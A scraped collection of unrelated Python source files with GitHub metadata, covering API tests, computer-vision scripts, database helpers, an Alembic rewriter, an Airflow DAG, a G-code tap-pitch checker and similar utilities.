"beta": beta,
},
}
}
def test_similarities_error():
for structure in test_structures:
response = client.post(
"/indigo/similarities",
json=similarity_request(
source=structure,
targets=[{"structure": "D", "format": "auto"}],
),
)
assert isinstance(response.json().get("errors"), list)
assert response.status_code == 400
assert len(response.json().get("errors")) == 1
# Descriptors
def descriptors_request(compound: dict, descriptors: tuple) -> dict:
return {
"data": {
"type": "descriptor",
"attributes": {"compound": compound, "descriptors": descriptors},
}
}
react_descriptors = [
jsonapi.Descriptors.COUNT_CATALYSTS,
jsonapi.Descriptors.COUNT_MOLECULES,
jsonapi.Descriptors.COUNT_PRODUCTS,
]
mol_descriptors = list(
filter(lambda x: x not in react_descriptors, jsonapi.Descriptors)
)
def test_base_descriptors() -> None:
max_iters = 10
for perm_number, descriptors in enumerate(
itertools.permutations(mol_descriptors, 4)
):
if perm_number == max_iters:
break
for compound in test_structures:
response = client.post(
"/indigo/descriptors",
json=descriptors_request(
compound=compound, descriptors=descriptors
),
)
assert response.status_code == 200
| karen-sarkisyan/Indigo | api/http/tests/test_indigo_http.py | test_indigo_http.py | py | 4,788 | python | en | code | null | github-code | 36 | [
{
"api_name": "fastapi.testclient.TestClient",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "indigo_service.indigo_http.app",
"line_number": 13,
"usage_type": "argument"
},
{
"api_name": "typing.List",
"line_number": 46,
"usage_type": "name"
},
{
"api_... |
3656577055 | import os
from ultralytics import YOLO
import cv2
from tracker import Tracker
import numpy as np
videoDir = os.path.\
join('.','data','people.mp4')
cap = cv2.VideoCapture(videoDir)
tracker = Tracker()
ret, frame = cap.read()
# uses deep sort
model = YOLO("yolov8n.pt")
num_1 = 0
num_2 = 0
# variables to be used
prev_centroids = []
centroids = []
totalTime = []
prevTime = []
i2 = 0
time = 0
# loops through the frames
while ret:
results = model(frame)
# checks one frame at a time
for result in results:
detections = []
for r in result.boxes.data.tolist():
x1, y1, x2, y2, score, class_id = r
x1 = int(x1)
y1 = int(y1)
x2 = int(x2)
y2 = int(y2)
class_id = int(class_id)
detections.append([x1, y1, x2, y2, score])
# algorithm to detect people
tracker.update(frame, detections)
threshold = 75
i = 0
# adds bounding box to people
for track in tracker.tracks:
bbox = track.bbox
x1, y1, x2, y2 = bbox
track_id = track.track_id
centroid_x = (int(y1))
centroids.append(centroid_x)
totalTime.append(0)
# checks if the y values can be compared
if prev_centroids :
dx = centroid_x - prev_centroids[i]
# checks if the yval is in the same range as it started
# as long as the val is in the same area then it must not be moving that fast or at all
if (-55 <= dx <= 55):
cv2.rectangle(frame, (int(x1), int(y1)), (int(x2), int(y2)), (0, 0, 100), 3)
prevTime[i] += 1
time = prevTime[i]
# assigns stars to sus persons
if(5 >= time > 1):
cv2.putText(frame, '*', (int(x1), int(y1)), cv2.FONT_HERSHEY_SIMPLEX, .27, (0, 0, 0), 8)
cv2.putText(frame, '*', (int(x1), int(y1)), cv2.FONT_HERSHEY_SIMPLEX, .27, (255, 255, 255), 2)
cv2.rectangle(frame, (int(x1), int(y1)), (int(x2), int(y2)), (0, 0, 125), 3)
elif (8 >= time > 5):
cv2.putText(frame, '**', (int(x1), int(y1)), cv2.FONT_HERSHEY_SIMPLEX, .27, (0, 0, 0), 8)
cv2.putText(frame, '**', (int(x1), int(y1)), cv2.FONT_HERSHEY_SIMPLEX, .27, (255, 255, 255), 2)
cv2.rectangle(frame, (int(x1), int(y1)), (int(x2), int(y2)), (0, 0, 150), 3)
elif (12 >= time > 8):
cv2.putText(frame, '***', (int(x1), int(y1)), cv2.FONT_HERSHEY_SIMPLEX, .27, (0, 0, 0), 8)
cv2.putText(frame, '***', (int(x1), int(y1)), cv2.FONT_HERSHEY_SIMPLEX, .27, (255, 255, 255), 2)
cv2.rectangle(frame, (int(x1), int(y1)), (int(x2), int(y2)), (0, 0, 175), 3)
elif (15 >= time > 12):
cv2.putText(frame, '****', (int(x1), int(y1)), cv2.FONT_HERSHEY_SIMPLEX, .27, (0, 0, 0), 8)
cv2.putText(frame, '****', (int(x1), int(y1)), cv2.FONT_HERSHEY_SIMPLEX, .27, (255, 255, 255), 2)
cv2.rectangle(frame, (int(x1), int(y1)), (int(x2), int(y2)), (0, 0, 200), 3)
elif (time > 15):
cv2.putText(frame, '*****', (int(x1), int(y1)), cv2.FONT_HERSHEY_SIMPLEX, .27, (0, 0, 0), 8)
cv2.putText(frame, '*****', (int(x1), int(y1)), cv2.FONT_HERSHEY_SIMPLEX, .27, (255, 255, 255), 2)
cv2.rectangle(frame, (int(x1), int(y1)), (int(x2), int(y2)), (0, 0, 250), 3)
cv2.rectangle(frame, (int(x1), int(y1)), (int(x2), int(y2)), (0, 250, 0), 5)
cv2.rectangle(frame, (int(x1), int(y1)), (int(x2), int(y2)), (0, 0, 250), 3)
print(dx)
pass
else:
cv2.rectangle(frame, (int(x1), int(y1)), (int(x2), int(y2)), (200, 0, 0), 5)
totalTime[i] = 0
# The person is moving
else:
# This is the first frame
cv2.rectangle(frame, (int(x1), int(y1)), (int(x2), int(y2)), (200, 0, 0), 3)
pass
i = i+1
# Update the list of previous centroids
if i2 > 0:
print("i2: ", i2)
else:
prevTime = totalTime
prev_centroids = centroids
i2 += 1
cv2.imshow('frame', frame)
cv2.waitKey(25)
ret, frame = cap.read()
cap.release()
cv2.destroyAllWindows() | PeterGQ/SuspicionDetector | main.py | main.py | py | 4,791 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.join",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "cv2.VideoCapture",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "tracker.Tracker",
"line_... |
32698917361 | from __future__ import annotations
import os
from typing import Union, TYPE_CHECKING
if TYPE_CHECKING:
from api.python.script_building.dag import DAGNode
from api.python.operator.nodes.matrix import Matrix
from api.python.operator.nodes.frame import Frame
from api.python.operator.nodes.scalar import Scalar
VALID_INPUT_TYPES = Union['DAGNode', str, int, float, bool]
# These are the operator symbols used in DaphneDSL (not in Python).
BINARY_OPERATIONS = ['+', '-', '/', '*', '^', '%', '<', '<=', '>', '>=', '==', '!=', '@', '&&', '||']
VALID_ARITHMETIC_TYPES = Union['DAGNode', int, float]
VALID_COMPUTED_TYPES = Union['Matrix', 'Frame', 'Scalar']
PYTHON_PATH = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
TMP_PATH = os.path.join(PYTHON_PATH, "tmp")
os.makedirs(TMP_PATH, exist_ok=True)
PROTOTYPE_PATH = os.path.dirname(os.path.dirname(os.path.dirname(PYTHON_PATH)))
# DAPHNE value type codes.
# The values need to be updated according to the value type codes in ValueTypeCode.h as this is a 1:1 copy.
SI8 = 0
SI32 = 1
SI64 = 2
UI8 = 3
UI32 = 4
UI64 = 5
F32 = 6
F64 = 7 | daphne-eu/daphne | src/api/python/utils/consts.py | consts.py | py | 1,109 | python | en | code | 51 | github-code | 36 | [
{
"api_name": "typing.TYPE_CHECKING",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "typing.Union",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "typing.Union",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "typing.Union",
"lin... |
12211586840 | import fileinput
from collections import Counter
from operator import mul, ne
from itertools import product
lines = list(map(lambda e: e.strip(), fileinput.input()))
counts = map(Counter, lines)
values = map(lambda e: set(e.values()), counts)
has_2_3 = map(lambda e: (2 in e, 3 in e), values)
sum_2_3 = map(sum, zip(*has_2_3))
print(mul(*sum_2_3))
for a, b in product(lines, lines):
if sum(map(lambda e: ne(*e), zip(a, b))) == 1:
same = map(lambda e: False if ne(*e) else e[0], zip(a, b))
common = ''.join(filter(None, same))
print(common)
break
| whg/aoc2018 | day2.py | day2.py | py | 585 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "fileinput.input",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "collections.Counter",
"line_number": 8,
"usage_type": "argument"
},
{
"api_name": "operator.mul",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "itertools.product"... |
15731069765 | from __future__ import annotations
from typing import Any
from typing import Callable
from typing import Iterator
from typing import List
from typing import Optional
from typing import Type
from typing import TYPE_CHECKING
from typing import Union
from .. import util
from ..operations import ops
if TYPE_CHECKING:
from ..operations.ops import AddColumnOp
from ..operations.ops import AlterColumnOp
from ..operations.ops import CreateTableOp
from ..operations.ops import MigrateOperation
from ..operations.ops import MigrationScript
from ..operations.ops import ModifyTableOps
from ..operations.ops import OpContainer
from ..runtime.environment import _GetRevArg
from ..runtime.migration import MigrationContext
class Rewriter:
"""A helper object that allows easy 'rewriting' of ops streams.
The :class:`.Rewriter` object is intended to be passed along
to the
:paramref:`.EnvironmentContext.configure.process_revision_directives`
parameter in an ``env.py`` script. Once constructed, any number
of "rewrites" functions can be associated with it, which will be given
the opportunity to modify the structure without having to have explicit
knowledge of the overall structure.
The function is passed the :class:`.MigrationContext` object and
``revision`` tuple that are passed to the :paramref:`.Environment
Context.configure.process_revision_directives` function normally,
and the third argument is an individual directive of the type
noted in the decorator. The function has the choice of returning
a single op directive, which normally can be the directive that
was actually passed, or a new directive to replace it, or a list
of zero or more directives to replace it.
.. seealso::
:ref:`autogen_rewriter` - usage example
"""
_traverse = util.Dispatcher()
_chained: Optional[Rewriter] = None
def __init__(self) -> None:
self.dispatch = util.Dispatcher()
def chain(self, other: Rewriter) -> Rewriter:
"""Produce a "chain" of this :class:`.Rewriter` to another.
This allows two rewriters to operate serially on a stream,
e.g.::
writer1 = autogenerate.Rewriter()
writer2 = autogenerate.Rewriter()
@writer1.rewrites(ops.AddColumnOp)
def add_column_nullable(context, revision, op):
op.column.nullable = True
return op
@writer2.rewrites(ops.AddColumnOp)
def add_column_idx(context, revision, op):
idx_op = ops.CreateIndexOp(
"ixc", op.table_name, [op.column.name]
)
return [op, idx_op]
writer = writer1.chain(writer2)
:param other: a :class:`.Rewriter` instance
:return: a new :class:`.Rewriter` that will run the operations
of this writer, then the "other" writer, in succession.
"""
wr = self.__class__.__new__(self.__class__)
wr.__dict__.update(self.__dict__)
wr._chained = other
return wr
def rewrites(
self,
operator: Union[
Type[AddColumnOp],
Type[MigrateOperation],
Type[AlterColumnOp],
Type[CreateTableOp],
Type[ModifyTableOps],
],
) -> Callable:
"""Register a function as rewriter for a given type.
The function should receive three arguments, which are
the :class:`.MigrationContext`, a ``revision`` tuple, and
an op directive of the type indicated. E.g.::
@writer1.rewrites(ops.AddColumnOp)
def add_column_nullable(context, revision, op):
op.column.nullable = True
return op
"""
return self.dispatch.dispatch_for(operator)
def _rewrite(
self,
context: MigrationContext,
revision: _GetRevArg,
directive: MigrateOperation,
) -> Iterator[MigrateOperation]:
try:
_rewriter = self.dispatch.dispatch(directive)
except ValueError:
_rewriter = None
yield directive
else:
if self in directive._mutations:
yield directive
else:
for r_directive in util.to_list(
_rewriter(context, revision, directive), []
):
r_directive._mutations = r_directive._mutations.union(
[self]
)
yield r_directive
def __call__(
self,
context: MigrationContext,
revision: _GetRevArg,
directives: List[MigrationScript],
) -> None:
self.process_revision_directives(context, revision, directives)
if self._chained:
self._chained(context, revision, directives)
@_traverse.dispatch_for(ops.MigrationScript)
def _traverse_script(
self,
context: MigrationContext,
revision: _GetRevArg,
directive: MigrationScript,
) -> None:
upgrade_ops_list = []
for upgrade_ops in directive.upgrade_ops_list:
ret = self._traverse_for(context, revision, upgrade_ops)
if len(ret) != 1:
raise ValueError(
"Can only return single object for UpgradeOps traverse"
)
upgrade_ops_list.append(ret[0])
directive.upgrade_ops = upgrade_ops_list
downgrade_ops_list = []
for downgrade_ops in directive.downgrade_ops_list:
ret = self._traverse_for(context, revision, downgrade_ops)
if len(ret) != 1:
raise ValueError(
"Can only return single object for DowngradeOps traverse"
)
downgrade_ops_list.append(ret[0])
directive.downgrade_ops = downgrade_ops_list
@_traverse.dispatch_for(ops.OpContainer)
def _traverse_op_container(
self,
context: MigrationContext,
revision: _GetRevArg,
directive: OpContainer,
) -> None:
self._traverse_list(context, revision, directive.ops)
@_traverse.dispatch_for(ops.MigrateOperation)
def _traverse_any_directive(
self,
context: MigrationContext,
revision: _GetRevArg,
directive: MigrateOperation,
) -> None:
pass
def _traverse_for(
self,
context: MigrationContext,
revision: _GetRevArg,
directive: MigrateOperation,
) -> Any:
directives = list(self._rewrite(context, revision, directive))
for directive in directives:
traverser = self._traverse.dispatch(directive)
traverser(self, context, revision, directive)
return directives
def _traverse_list(
self,
context: MigrationContext,
revision: _GetRevArg,
directives: Any,
) -> None:
dest = []
for directive in directives:
dest.extend(self._traverse_for(context, revision, directive))
directives[:] = dest
def process_revision_directives(
self,
context: MigrationContext,
revision: _GetRevArg,
directives: List[MigrationScript],
) -> None:
self._traverse_list(context, revision, directives)
| sqlalchemy/alembic | alembic/autogenerate/rewriter.py | rewriter.py | py | 7,384 | python | en | code | 2,219 | github-code | 36 | [
{
"api_name": "typing.TYPE_CHECKING",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "typing.Optional",
"line_number": 55,
"usage_type": "name"
},
{
"api_name": "typing.Union",
"line_number": 97,
"usage_type": "name"
},
{
"api_name": "typing.Type",
"... |
24339607859 | from logging import Logger
from pathlib import Path
import shutil
class IsNotAFileError(OSError):
"""Exception raised if operation only works on files."""
class IsNotADirectoryError(OSError):
"""Exception raised if operation only works on directories."""
class NonEmptyDirectoryError(OSError):
"""Exception raised if operation only works on empty directories."""
def path_with_suffix(path: Path, suffix: str):
"""Adds a suffix to a path if necessary."""
if suffix and not path.suffix == suffix:
path = path.with_suffix(suffix)
return path
def check_remove_filepath(path: Path, log: Logger, force: bool):
"""Checks the path does not point to a file, if it does will raise an error or remove it."""
path.parent.mkdir(parents=True, exist_ok=True)
if path.exists():
if not path.is_file():
log.error("%s exists and is not a file, aborting", path)
raise IsNotAFileError
if not force:
log.error("%s already exists, aborting (use -f/--force to overwrite)", path)
raise FileExistsError
log.warn("%s already exists, overwritten", path)
path.unlink()
def check_exists_filepath(path: Path, log: Logger):
"""Checks the path points to a file, if it doesn't will raise an error."""
if not path.exists():
log.error("%s already exists, aborting", path)
raise FileNotFoundError
def check_empty_directory(path: Path, log: Logger, force: bool, ignore: bool):
"""Checks the path does not point to a non-empty directory, if it does will raise an error or
empty it."""
path.parent.mkdir(parents=True, exist_ok=True)
if path.exists():
if not path.is_dir():
log.error("%s exists and is not a directory, aborting", path)
raise IsNotADirectoryError
if not (force or ignore):
log.error(
"%s already exists, aborting (use -f/--force to empty or -i/--ignore to ignore)",
path,
)
raise NonEmptyDirectoryError
if ignore:
log.warn("%s already exists and is non-empty, ignoring anyway", path)
return
log.warn(
"%s already exists and is non-empty, removing all files and sub-directories",
path,
)
shutil.rmtree(path.as_posix())
path.mkdir()
| src-d/ml-mining | sourced/ml/mining/utils/fs.py | fs.py | py | 2,380 | python | en | code | 8 | github-code | 36 | [
{
"api_name": "pathlib.Path",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "pathlib.Path",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "logging.Logger",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "pathlib.Path",
"line_num... |
5799651728 | import vqa_gradients
import numpy as np
from scipy.linalg import expm
from scipy.stats import unitary_group
from scipy.misc import derivative
import functools as ft
tp = lambda a,b: np.tensordot(a,b,axes=0)
n_qubits = 3
H = 1/np.sqrt(2) * np.array([[1,1],[1,-1]])
X = np.array([[0,1],[1,0]])
M = ft.reduce(tp, np.repeat(H, n_qubits))
Psi = np.zeros((2**n_qubits,1)); Psi[0] = 1
G = np.diag(np.random.choice([1,2,3,4,5,6,7,8,9,10], 2**n_qubits))
W = vqa_gradients.complete_graph(2**n_qubits)/2**n_qubits
#W = np.diag(np.random.choice([1,2,3,4,5,6,7,8,9,10], 2**n_qubits))
R = vqa_gradients.find_R_from_qualities(np.linalg.eigvals(W))
rnd1 = unitary_group.rvs(2**n_qubits)
rnd2 = unitary_group.rvs(2**n_qubits)
def E(param):
U = ft.reduce(np.matmul,
[rnd2,
expm(-1j*param*W),
rnd1,
Psi])
U_dagger = U.conj().T
return ft.reduce(np.matmul, [U_dagger,G,U])
E = np.vectorize(E)
x = np.array([(2*np.pi*i)/(2*R+1) for i in range(-R,R+1)])
y = E(x)
s = vqa_gradients.Series(x,y)
s.plot(function=E)
rnd = np.random.random()*6-3
print(s.gradient(rnd))
print(derivative(E,rnd,dx=1e-6)[0,0])
| Mark-D-W/vqa_gradients | tests/test_Series.py | test_Series.py | py | 1,176 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.tensordot",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "numpy.sqrt",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number"... |
30333853221 | import cv2
import numpy as np
import matplotlib.pyplot as plt
# H entre 0 e 33 (cor de pele)
# S entre 58 e 255 (saturação S baixo = branco)
# V entre 30 e 255 (V = 0 preto)
min_HSV = np.array([0, 58, 30], dtype="uint8")
# for better results, use skin-detector-YCrCb colorspace
max_HSV = np.array([33, 255, 255], dtype="uint8")
# takes your webcam input
vid = cv2.VideoCapture(0)
while(True):
ret, frame = vid.read()
imageHSV = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
roiSkin = cv2.inRange(imageHSV, min_HSV, max_HSV)
skin = cv2.bitwise_and(frame, frame, mask=roiSkin)
cv2.imshow('segmentado', skin)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
vid.release()
cv2.destroyAllWindows()
| Vicinius/digital-image-processing | pratica05/skin-detector-hsv.py | skin-detector-hsv.py | py | 721 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.array",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "cv2.VideoCapture",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "cv2.cvtColor",
"line_numbe... |
71929274345 | from model import Todo
import motor.motor_asyncio
client = motor.motor_asyncio.AsyncIOMotorClient('mongodb://root:example@localhost:27017/TodoList?authSource=admin')
database = client.TodoList
collection = database.todo
async def fetchOneTodo(title):
document = await collection.find_one({"title":title})
return document
async def fetchAllTodos():
todos = []
cursor = collection.find({})
async for document in cursor:
todos.append(Todo(**document))
return todos
async def createTodo(todo):
document = todo
result = await collection.insert_one(document)
return result
async def updateTodo(title,desc):
await collection.update_one({"title":title}, {"$set":{
"description":desc}})
document = await collection.find_one({"title":title})
return document
async def removeTodo(title):
await collection.delete_one({"title":title})
return True | coronel08/farm-stack-todo | backend/database.py | database.py | py | 912 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "motor.motor_asyncio.motor_asyncio.AsyncIOMotorClient",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "motor.motor_asyncio.motor_asyncio",
"line_number": 4,
"usage_type": "attribute"
},
{
"api_name": "motor.motor_asyncio",
"line_number": 4,
"usage_... |
31706326025 | import argparse
import torch
import os
from torch.utils.data import DataLoader
from dataset.dataset import Crowd
from model.model import Count
import numpy as np
def parse_arg():
parser = argparse.ArgumentParser()
parser.add_argument('--downsample-ratio', default=8, type=int,
help='the downsample ratio of the model')
parser.add_argument('--data-dir', default='QNRF/val',
help='the directory of the data')
parser.add_argument('--pretrained', default='pretrained/pcpvt_large.pth',
help='the path to the pretrained model')
parser.add_argument('--model-path', default='history/lr_1e-4_gamma_2_15/best_model.pth',
help='the path to the model')
parser.add_argument('--drop', type=float, default=0.0, metavar='PCT',
help='Dropout rate (default: 0.)')
parser.add_argument('--drop-path', type=float, default=0.45, metavar='PCT',
help='Drop path rate (default: 0.1)')
parser.add_argument('--device', default='0',
help="assign device")
args = parser.parse_args()
return args
if __name__ == '__main__':
args = parse_arg()
torch.backends.cudnn.benchmark = True
os.environ['CUDA_VISIBLE_DEVICES'] = args.device.strip()
dataset = Crowd(args.data_dir, 512, args.downsample_ratio, method='val')
dataloader = DataLoader(dataset, 1, shuffle=False, pin_memory=False)
model = Count(args)
device = torch.device('cuda')
model.to(device)
model.load_state_dict(torch.load(args.model_path, device))
model.eval()
res = []
step = 0
for im, gt, size in dataloader:
im = im.to(device)
with torch.set_grad_enabled(False):
result, _, _, _, _, _ = model(im)
res1 = gt.item() - torch.sum(result).item()
res.append(res1)
print('{}/{}: GT:{}, predict:{:.2f}, diff:{:.2f}'.format(step, len(dataset), gt.item(), torch.sum(result).item(),
res1), size[0])
step = step + 1
print('MAE: {:.2f}, MSE:{:.2f}'.format(np.mean(np.abs(res)), np.sqrt(np.mean(np.square(res)))))
| cha15yq/CUT | test.py | test.py | py | 2,238 | python | en | code | 10 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "torch.backends",
"line_number": 34,
"usage_type": "attribute"
},
{
"api_name": "os.environ",
"line_number": 35,
"usage_type": "attribute"
},
{
"api_name": "dataset.d... |
23410785734 | # -*- coding: utf-8 -*-
"""
简单的两步任务, 串行.
"""
from datetime import datetime
from airflow.decorators import dag, task
dag_id = "dag2"
@dag(
dag_id=dag_id,
start_date=datetime(2021, 1, 1),
schedule="@once",
catchup=False,
)
def dag2():
"""
这个例子中我们有两个 Task, 先运行 Task 1, 再运行 Task 2. 如果 Task 1 不成功, 则不运行 Task 2.
我们的两个 Task 的任务都是生成一个随机数, 然后写入到 S3 中. 不过 Task 1 有 50% 的概率会失败.
你可以看到如果 Task 1 失败了, 则 Task 2 不会被执行.
"""
task1_id = "task1"
task2_id = "task2"
@task(
task_id=task1_id,
)
def task1():
import json
import random
from datetime import datetime
import boto3
print("Start task1")
# 有 50% 的概率失败
if random.randint(1, 100) <= 50:
raise Exception("Randomly failed")
aws_account_id = boto3.client("sts").get_caller_identity()["Account"]
aws_region = "us-east-1"
value = random.randint(1, 100)
print(f"Generated value is {value}")
data = {
"value": value,
"datetime": datetime.now().isoformat(),
}
boto3.client("s3").put_object(
Bucket=f"{aws_account_id}-{aws_region}-data",
Key=f"projects/mwaa-poc/{dag_id}/{task1_id}.output.json",
Body=json.dumps(data),
ContentType="application/json",
)
print("End task1")
return "Returned by task 1"
@task(
task_id=task2_id,
)
def task2():
import json
import random
from datetime import datetime
import boto3
print("Start task2")
aws_account_id = boto3.client("sts").get_caller_identity()["Account"]
aws_region = "us-east-1"
value = random.randint(1, 100)
print(f"Generated value is {value}")
data = {
"value": value,
"datetime": datetime.now().isoformat(),
}
boto3.client("s3").put_object(
Bucket=f"{aws_account_id}-{aws_region}-data",
Key=f"projects/mwaa-poc/{dag_id}/{task2_id}.output.json",
Body=json.dumps(data),
ContentType="application/json",
)
print("End task2")
return "Returned by task 2"
# 这里调用了两个 task 函数, 就相当于告诉 Airflow 我要运行他们两. 默认情况下 Airflow
# 认为它们是并行, 没有依赖关系, 但是如果你用 >>, << 这样的符号连接他们, 就表示他们是
# 有依赖关系的.
# Ref: https://airflow.apache.org/docs/apache-airflow/stable/tutorial/fundamentals.html#setting-up-dependencies
run_task1 = task1()
run_task2 = task2()
run_task1 >> run_task2
run_dag2 = dag2()
| MacHu-GWU/Dev-Exp-Share | docs/source/Open-Source-Softwares/Amazon-Managed-Workflows-for-Apache-Airflow-MWAA/02-Common-Patterns/dags/dag2.py | dag2.py | py | 2,892 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "random.randint",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "boto3.client",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 47,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.now",
... |
16559387946 | from rich import print
from rich.console import Console
from rich.table import Table
from decimal import *
import sys
# TODO: Load file by launching with arguments
# Pitch calculation for non feed/rev
# Ignore comments when finding G84
manualFile=False
filePath = "Sample Gcode/Solidworks/CGIP11719.nc"
if manualFile == True:
with open(filePath, 'r') as file:
lines = file.readlines()
else:
try:
droppedFile = sys.argv[1:]
except IndexError:
print("No file selected")
for p in droppedFile:
filePath = p
with open(p, 'r') as file:
lines = file.readlines()
def readLine(line):
codeList = ['G','M','T','S','F','X','Y','Z','H','D','N','R','P']
newWord = ""
wordList = []
comment = False
for i, char in enumerate(line):
if char == "(":
comment=True
elif char == ")" and comment == True:
comment=False
elif char in codeList or char == "\n" or char == " ":
if newWord != "" and newWord != " ":
wordList.append(newWord)
newWord = ""
if comment==False and char != ")":
newWord += char
return(wordList)
def readWords(words, values):
for word in words:
letter = word[0] # Separate key letter from value
value = word[1:]
if letter == 'F':
if values["feed"] == False:
values["feed"] = float(value)
elif letter == 'S':
if values["rpm"]== False:
values["rpm"] = int(value)
elif letter == 'T':
if values["tool"] == False:
values["tool"] = int(value)
if values["feedPerRev"] == False:
values["feedPerRev"] = "NO"
elif letter == 'G' and int(value) == 98:
values["feedPerRev"] = True
# print((letter,value))
return(values)
tappingCycleIndex = [] # Store all G84 values to read related Gcode
for lineIndex, line in enumerate(lines):
if line.find("G84") != -1:
tappingCycleIndex.append(lineIndex+1)
allValues = [] # Store information about each tapping cycle
for tappingCycle in tappingCycleIndex:
valueDict = {"tool":False, "rpm":False, "feed":False, "feedPerRev":False}
lineToRead = tappingCycle
while False in valueDict.values():
words = readLine(lines[lineToRead])
readWords(words, valueDict)
lineToRead -= 1
allValues.append(valueDict)
# Sort data
allValues = sorted(allValues, key= lambda i: i['tool'])
# Calculate pitches
def calculatePitch(tappingData):
if tappingData["feedPerRev"] == True:
tappingData["metricPitch"] = round(tappingData["feed"] * 25.4, 3)
tappingData["threadsPerInch"] = round(1 / tappingData["feed"], 2)
else:
tappingData["metricPitch"] = round(tappingData["rpm"] / tappingData["feed"] * 25.4, 3)
tappingData["threadsPerInch"] = round(tappingData["rpm"] / tappingData["feed"], 2)
for value in allValues:
calculatePitch(value)
# Print Results
print("File loaded:", filePath)
console = Console()
table = Table(show_header=True)
table.add_column("Tool #")
table.add_column("RPM")
table.add_column("Feed")
table.add_column("Metric Pitch")
table.add_column("Threads per Inch")
for tool in allValues:
table.add_row(str(tool["tool"]),str(tool["rpm"]),str(tool["feed"]),str(tool["metricPitch"]),str(tool["threadsPerInch"]))
console.print(table)
input("Press enter to continue...") | nick-burrill/Gcode-Tools | Tap Checker.py | Tap Checker.py | py | 3,497 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "sys.argv",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "rich.print",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "rich.print",
"line_number": 101,
"usage_type": "call"
},
{
"api_name": "rich.console.Console",
"line... |
26312475383 | import sys
from os import path
import numpy
import scipy
import cupy
import cupyx
import datetime
from dataclasses import dataclass
@dataclass
class ExecutionSetup:
gpu: bool = False
precision: str = 'float64'
data_folder: str = f".{path.sep}data{path.sep}"
precision_np = numpy.float64
precision_cp = cupy.float64
class CPU_GPU_Abstractor:
def __init__(self, exec_setup: ExecutionSetup):
self.exec_setup = exec_setup
self.__setup_numpy_and_scipy()
self.__setup_precision()
self.__pb_started = False
def __setup_precision(self):
if self.exec_setup.precision == 'float32':
self.exec_setup.precision = self.xp.float32
self.exec_setup.precision_np = numpy.float32
self.exec_setup.precision_cp = cupy.float32
elif self.exec_setup.precision == 'float64':
self.exec_setup.precision = self.xp.float64
self.exec_setup.precision_np = numpy.float64
self.exec_setup.precision_cp = cupy.float64
else:
raise Exception("Invalid floating point precision specified")
def __setup_numpy_and_scipy(self):
if cupy.cuda.runtime.getDeviceCount() > 0 and self.exec_setup.gpu:
self.xp = cupy
self.scipy = cupyx.scipy
self.gpu = True
device = cupy.cuda.Device(0)
print(f"GPU-Device ID: {device.id}")
print(f"GPU-Compute Capability: {device.compute_capability}")
print(f"GPU-Memory available: {device.mem_info[0]/1e6:.1f}/{device.mem_info[1]/1e6:.1f} MB")
else:
self.xp = numpy
self.scipy = scipy
self.gpu = False
def _print_progress_bar(self, progress, max, progress_bar_length=40, title="Progress"):
progress_ratio = progress/max
if not self.__pb_started:
self.__ts = datetime.datetime.now()
self.__pb_started = True
tc = datetime.datetime.now()
tf = (1/progress_ratio -1)*(tc - self.__ts).total_seconds()
title = f"\r{title}: {progress:5}/{max:5}: "
success_rate = f" {progress_ratio*100:3.2f}%"
remaining_time = f" ERT: {int(tf/60):02}:{int(tf%60):02}"
number_of_progress_indicators = int(progress * progress_bar_length // (max))
sys.stdout.write(title + "[" + number_of_progress_indicators*"#" + (progress_bar_length - number_of_progress_indicators)*"-" + "]" + success_rate + remaining_time)
def _end_progress_bar(self):
sys.stdout.write("\n")
self.__pb_started = False
def _get_array_from_disk_or_mem(self, A):
if type(A) == str and path.exists(self.exec_setup.data_folder + A):
return self.xp.load(self.exec_setup.data_folder + A)
elif type(A) == cupy.ndarray or type(A) == numpy.ndarray:
if self.gpu:
return cupy.asarray(A)
else:
return cupy.asnumpy(A)
else:
raise Exception("Array has invalid type. Needs to be either a path to an array or a cupy.ndarray or a numpy.ndarray")
def asnumpy(self, a):
"""Move array to host"""
return cupy.asnumpy(a)
def ascupy(self, a):
"""Move array to device"""
return cupy.asarray(a)
| chrasa/removal-of-imaging-artifacts-NN | cpu_gpu_abstraction.py | cpu_gpu_abstraction.py | py | 3,305 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.sep",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "os.path",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "numpy.float64",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "cupy.float64",
"line_... |
25937674832 | from core.base_classes.entity import BaseEntityProps
from core.value_objects import DateVO, ID
from abc import ABC, abstractmethod
from typing import Any, Generic, TypeVar, get_args
